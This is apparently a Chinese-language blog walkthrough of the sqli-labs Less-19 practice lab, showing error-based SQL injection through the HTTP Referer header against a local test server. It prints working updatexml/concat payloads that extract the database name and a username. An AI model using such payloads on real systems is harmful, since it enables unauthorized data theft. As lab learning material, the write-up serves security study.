sqli-labs(19)

百度了一下 基于错误的referer头的注入

0X01爱之初体验

猜测是基于referer头的注入 我们在referer后面加入单引号测试一下

sqli-labs(19)_第1张图片

真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了

语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构

sqli-labs(19)_第2张图片

原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造闭合语句

sqli-labs(19)_第3张图片

好像成功了诶

0X02构造语句 查询数据库

Referer: http://127.0.0.1/sql1/Less-19/',updatexml(1,concat(0x3a,database(),0x3a),1))#

sqli-labs(19)_第4张图片

得到我们的数据库名称

对于 查询表名 列名来说 和17 18 关一样 用limit函数

但是这里我们还是来讲一下字段名吧 因为常规报错

Referer: http://127.0.0.1/sql1/Less-19/',updatexml(1,concat(0x3a,(select username from  users limit 0,1),0x3a),1))#

我的天 18关是不能再users表里面直接查的 因为要插入的数据表就是users里面的 这里居然成功了

sqli-labs(19)_第5张图片

 

 

切记 学习之路 少就是多 慢就是快

你可能感兴趣的:(sqli-labs(19))